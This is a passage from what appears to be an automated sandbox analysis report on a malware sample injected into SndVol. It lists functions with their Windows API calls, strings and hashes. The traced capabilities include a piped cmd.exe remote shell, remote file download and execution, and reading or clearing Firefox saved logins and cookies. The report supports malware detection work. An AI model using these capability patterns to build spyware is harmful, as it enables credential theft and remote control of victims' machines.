                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,02951FD7,00000000,0000000F,0294EA3D,?,?,02950AA6,?,00000000), ref: 0296BA1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1482568997-0
                                                                                                                        • Opcode ID: 168c5a19a864b4cca40e538e2419fbd2884433279c7141e199205bc1fb012197
                                                                                                                        • Instruction ID: 9efbb4bfaedabafe76d2e67bc6cdf4e4117b3d6c2078a7b75c0404a28010972d
                                                                                                                        • Opcode Fuzzy Hash: 168c5a19a864b4cca40e538e2419fbd2884433279c7141e199205bc1fb012197
                                                                                                                        • Instruction Fuzzy Hash: 8BF0C232540511669B212A26DC1CB7B2BED9FC1BBCB140125E818FA180FF24C841C9A1
                                                                                                                        Function 029241F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 02924212
                                                                                                                          • Part of subcall function 02924262: WSAStartup.WS2_32(00000202,00000000), ref: 02924277
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02924252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1953588214-0
                                                                                                                        • Opcode ID: 4b2b1c943e953daf362b878fe958a1b8ee72cbc67e67f5ee47622ee435cdfe84
                                                                                                                        • Instruction ID: 230746d96b2b171f7bf978403d0bd3466eafee3c4091ec35ad7de65c474d3384
                                                                                                                        • Opcode Fuzzy Hash: 4b2b1c943e953daf362b878fe958a1b8ee72cbc67e67f5ee47622ee435cdfe84
                                                                                                                        • Instruction Fuzzy Hash: 61017C70848B909ED7358F39B4487A6BFE1AB19314F045E5EF1DA87B95C3B1A484CF10
                                                                                                                        Function 0295360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02953DE7
                                                                                                                          • Part of subcall function 02957BD7: RaiseException.KERNEL32(?,?,?,02953E09,00000000,00000000,?,?,?,?,?,?,02953E09,?,0298D5EC), ref: 02957C37
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02953E04
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3476068407-0
                                                                                                                        • Opcode ID: eb4d0d25aae0ac4b3acb806ba3e4638b5f050b829978a3748017b917e31b6858
                                                                                                                        • Instruction ID: 87bffcaca5513256aaba5f3c4748ccf4eac3f08c537c06916d59163f440dfd50
                                                                                                                        • Opcode Fuzzy Hash: eb4d0d25aae0ac4b3acb806ba3e4638b5f050b829978a3748017b917e31b6858
                                                                                                                        • Instruction Fuzzy Hash: D7F0B434A0021D76DB04F7B4E81999D77BD4E40394F5046B9BE24924E0EF70E609CBD8
                                                                                                                        Function 02933F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,02991B28,02994358,00000000,02934240,00000000,00000001), ref: 02933FBC
                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02933FC1
                                                                                                                          • Part of subcall function 02933E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02933E86
                                                                                                                          • Part of subcall function 02933E37: LoadLibraryA.KERNEL32(?), ref: 02933EC8
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933EE8
                                                                                                                          • Part of subcall function 02933E37: FreeLibrary.KERNEL32(00000000), ref: 02933EEF
                                                                                                                          • Part of subcall function 02933E37: LoadLibraryA.KERNEL32(?), ref: 02933F27
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933F39
                                                                                                                          • Part of subcall function 02933E37: FreeLibrary.KERNEL32(00000000), ref: 02933F40
                                                                                                                          • Part of subcall function 02933E37: GetProcAddress.KERNEL32(00000000,?), ref: 02933F4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1170566393-0
                                                                                                                        • Opcode ID: 5f51c907e42455692e03da57028c8c761c7f7a665e7057df7fcfa0e50ddd0011
                                                                                                                        • Instruction ID: 70de74e4ef595fa589664073c0eb38eb436c1b4e209f7f1d48d850f10f0d2bc2
                                                                                                                        • Opcode Fuzzy Hash: 5f51c907e42455692e03da57028c8c761c7f7a665e7057df7fcfa0e50ddd0011
                                                                                                                        • Instruction Fuzzy Hash: 4BD01772A851226BB322666DAC40EBBAAEDDFE6674B56046AB404D2100D6908C1686A9
                                                                                                                        Function 0292BED7 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0292D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0298556C,00000003,00000000), ref: 0292BEE6
                                                                                                                        • GetLastError.KERNEL32 ref: 0292BEF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1925916568-0
                                                                                                                        • Opcode ID: e54169e71cb62bb5338b6a4110aff5b964261b4a18f0e46e6b9ac0cd51e3ee07
                                                                                                                        • Instruction ID: 70047106795df1afacdc93421da59929dfd13a2964ca63ac2a06edd0943e88a3
                                                                                                                        • Opcode Fuzzy Hash: e54169e71cb62bb5338b6a4110aff5b964261b4a18f0e46e6b9ac0cd51e3ee07
                                                                                                                        • Instruction Fuzzy Hash: 30D01270A883019BDB0817B8784A7793595AB94702F010919B10BC55C0DB6448645911
                                                                                                                        Function 02929517 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 176396367-0
                                                                                                                        • Opcode ID: 59723d515f2dd5a4a67cde4aa9fac7a937e03c24c08970964ffa094e4c3d53ff
                                                                                                                        • Instruction ID: 5a62ac7c88e8a0428a892e7b280118597ac99bee17d532a5cdab011282926315
                                                                                                                        • Opcode Fuzzy Hash: 59723d515f2dd5a4a67cde4aa9fac7a937e03c24c08970964ffa094e4c3d53ff
                                                                                                                        • Instruction Fuzzy Hash: C911A5329002549FDB19EF64D890CEF7BB6AFA4310F10442EE81652295EF74AD2DCF90
                                                                                                                        Function 02966AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 42d1d6267a1cb8eb3626f541812ec717bb338d076b04a3a3ca64af0a5f033ffb
                                                                                                                        • Instruction ID: 8a7c1d841c1105c640572d3b26e485cbb7777420c2e79b205f203865ad97778d
                                                                                                                        • Opcode Fuzzy Hash: 42d1d6267a1cb8eb3626f541812ec717bb338d076b04a3a3ca64af0a5f033ffb
                                                                                                                        • Instruction Fuzzy Hash: 59E0653164D127E6EA212A79AC0CF7A7ACD9B817A4F0501299C19A6090DB58C80085A0
                                                                                                                        Function 02924262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 02924277
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Startup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 724789610-0
                                                                                                                        • Opcode ID: 8c75244a0952b2f19a2ae634693223d65f1633180a31837bc365fa76c9ad75d3
                                                                                                                        • Instruction ID: d422b16750b1d1975c4d0f6a3a661eb1731b97ed5e10a5f1a061e5423be15330
                                                                                                                        • Opcode Fuzzy Hash: 8c75244a0952b2f19a2ae634693223d65f1633180a31837bc365fa76c9ad75d3
                                                                                                                        • Instruction Fuzzy Hash: C2D01332D9D6094ED51065F45C0F8F4775CD317711F0007755C75C26C2E540162CC2B7
                                                                                                                        Function 0294610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809346765-0
                                                                                                                        • Opcode ID: 99195489b495b2feac2d7c26b0c4f20aaa9489326f7ccecdb47095e55a04954b
                                                                                                                        • Instruction ID: 38259243aa076e65a4c79d1f5d3a56961e309e4784db6f56a6230932682abe51
                                                                                                                        • Opcode Fuzzy Hash: 99195489b495b2feac2d7c26b0c4f20aaa9489326f7ccecdb47095e55a04954b
                                                                                                                        • Instruction Fuzzy Hash: 8AB09B75508301FF8B051790C80487A7F7697C8340B004C1C754641130C5328454D731

                                                                                                                        Non-executed Functions

                                                                                                                        Function 02926F06 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 849filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 02926F28
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 02926FF8
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 02927018
                                                                                                                          • Part of subcall function 0293B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B489
                                                                                                                          • Part of subcall function 0293B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B4BB
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B50C
                                                                                                                          • Part of subcall function 0293B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B561
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B568
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                          • Part of subcall function 02926BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,02985454,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C38
                                                                                                                          • Part of subcall function 02926BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C80
                                                                                                                          • Part of subcall function 02926BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,02927273,00000000,?,0000000A,00000000,00000000), ref: 02926CC0
                                                                                                                          • Part of subcall function 02926BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 02926CDD
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                          • Part of subcall function 02924468: WaitForSingleObject.KERNEL32(?,00000000,02921943,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000), ref: 0292450E
                                                                                                                          • Part of subcall function 02924468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000,?,?,?,?,?,02921943), ref: 0292453C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02927416
                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 029274F5
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0292773A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 029278CC
                                                                                                                          • Part of subcall function 02927A8C: __EH_prolog.LIBCMT ref: 02927A91
                                                                                                                          • Part of subcall function 02927A8C: FindFirstFileW.KERNEL32(00000000,?,02985AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B4A
                                                                                                                          • Part of subcall function 02927A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B6E
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 02927976
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 029279BA
                                                                                                                          • Part of subcall function 0293BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0293BC6C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                        • API String ID: 2918587301-1507758755
                                                                                                                        • Opcode ID: 5dca4dc75fcb8dec8dc0e82165c2d62246b64c7b740fb832231912f22ab2408d
                                                                                                                        • Instruction ID: aad809210831f56356a71ba230ca164f8dc1bcac6f4c91ce1e32d287689ce6bc
                                                                                                                        • Opcode Fuzzy Hash: 5dca4dc75fcb8dec8dc0e82165c2d62246b64c7b740fb832231912f22ab2408d
                                                                                                                        • Instruction Fuzzy Hash: 3542B372A043609BCA18FB74DC659AFB7ABAFD0710F40091DE44A5719DEF609A1CCE93
                                                                                                                        Function 02925042 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 280pipesleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0292508E
                                                                                                                          • Part of subcall function 029534CF: EnterCriticalSection.KERNEL32(02990D18,02995BF0,?,029217C1,02995BF0,00000000), ref: 029534D9
                                                                                                                          • Part of subcall function 029534CF: LeaveCriticalSection.KERNEL32(02990D18,?,029217C1,02995BF0,00000000), ref: 0295350C
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 029250CB
                                                                                                                        • CreatePipe.KERNEL32(02995CEC,02995CD4,02995BF8,00000000,0298556C,00000000), ref: 0292515E
                                                                                                                        • CreatePipe.KERNEL32(02995CD8,02995CF4,02995BF8,00000000), ref: 02925174
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02995C08,02995CDC), ref: 029251E7
                                                                                                                          • Part of subcall function 02953519: EnterCriticalSection.KERNEL32(02990D18,02995B70,02995BF0,?,0292179E,02995BF0), ref: 02953524
                                                                                                                          • Part of subcall function 02953519: LeaveCriticalSection.KERNEL32(02990D18,?,0292179E,02995BF0), ref: 02953561
                                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0292523F
                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02925264
                                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02925291
                                                                                                                          • Part of subcall function 029538A5: __onexit.LIBCMT ref: 029538AB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,02993F98,02985570,00000062,02985554), ref: 0292538E
                                                                                                                        • Sleep.KERNEL32(00000064,00000062,02985554), ref: 029253A8
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 029253C1
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253CD
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253D5
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253E7
                                                                                                                        • CloseHandle.KERNEL32 ref: 029253EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                        • String ID: SystemDrive$cmd.exe
                                                                                                                        • API String ID: 3815868655-3633465311
                                                                                                                        • Opcode ID: b9fc87444b57ed494da217c767ed7e4a61548b4bc69cbc75260c0b0ef23d707b
                                                                                                                        • Instruction ID: e37786f0cf96dd1185ecf8a3e1765151dbbe454eacdc653d02042dd963422d70
                                                                                                                        • Opcode Fuzzy Hash: b9fc87444b57ed494da217c767ed7e4a61548b4bc69cbc75260c0b0ef23d707b
                                                                                                                        • Instruction Fuzzy Hash: C291D871A48315AFD705BB68ED4093F779AABC0360FC2082DF95AA6195EF605C1CCF61
                                                                                                                        Function 0292B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0292B3B4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B3CE
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0292B4F1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B517
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                                        • Opcode ID: c26075c42ffa22f397b9c4d7faca505939aebd9bfcacd131a6d54bbbfa95a543
                                                                                                                        • Instruction ID: 570ccc1fd990e02e057dedf719454188a7fb4f269ce256d3bdf554b74dd38343
                                                                                                                        • Opcode Fuzzy Hash: c26075c42ffa22f397b9c4d7faca505939aebd9bfcacd131a6d54bbbfa95a543
                                                                                                                        • Instruction Fuzzy Hash: 62517231D041295BDB14FBB0EC65EED777ABFA0324F440069E40AA20D9EF706A5DCE95
                                                                                                                        Function 0292B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0292B5B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B5CC
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0292B68C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B6B2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0292B6D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                        • API String ID: 3527384056-432212279
                                                                                                                        • Opcode ID: 4360ef60dd6c0be687d361762c2e729920f3bcf5443da40128087c20491ff643
                                                                                                                        • Instruction ID: 4f6c3fa57881004e535525ae60ecef52c06d634f4f2b78ab51bcc0afa2eadcad
                                                                                                                        • Opcode Fuzzy Hash: 4360ef60dd6c0be687d361762c2e729920f3bcf5443da40128087c20491ff643
                                                                                                                        • Instruction Fuzzy Hash: 494190319042295BDB14FBB0EC65EFD776EAFA1324F450029E406A3089EF705A5DCE95
                                                                                                                        Function 029359C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 029359C7
                                                                                                                        • EmptyClipboard.USER32 ref: 029359D5
                                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 029359F5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 029359FE
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A34
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 02935A3D
                                                                                                                        • CloseClipboard.USER32 ref: 02935A5A
                                                                                                                        • OpenClipboard.USER32 ref: 02935A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 02935A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02935A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A83
                                                                                                                        • CloseClipboard.USER32 ref: 02935A89
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3520204547-0
                                                                                                                        • Opcode ID: 008bd2f63373a01c47683dfe0ebb5a79e2d649e35fe59b5af6792b2999e8be07
                                                                                                                        • Instruction ID: 6a422ab42c14c8a14b73ae914e46137f194a12a16ae5c5f4ea614e473f750e7f
                                                                                                                        • Opcode Fuzzy Hash: 008bd2f63373a01c47683dfe0ebb5a79e2d649e35fe59b5af6792b2999e8be07
                                                                                                                        • Instruction Fuzzy Hash: D1216571A442109BD715BBF4EC59AFEB7AAEFD4711F410D2DF80686185EF30481D8B62
                                                                                                                        Function 0292E219 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 212processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,02994358), ref: 0292E233
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02994358), ref: 0292E25E
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0292E27A
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E2FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,02994358), ref: 0292E30C
                                                                                                                          • Part of subcall function 029327D5: RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
                                                                                                                          • Part of subcall function 029327D5: RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
                                                                                                                          • Part of subcall function 029327D5: RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,02994358), ref: 0292E371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
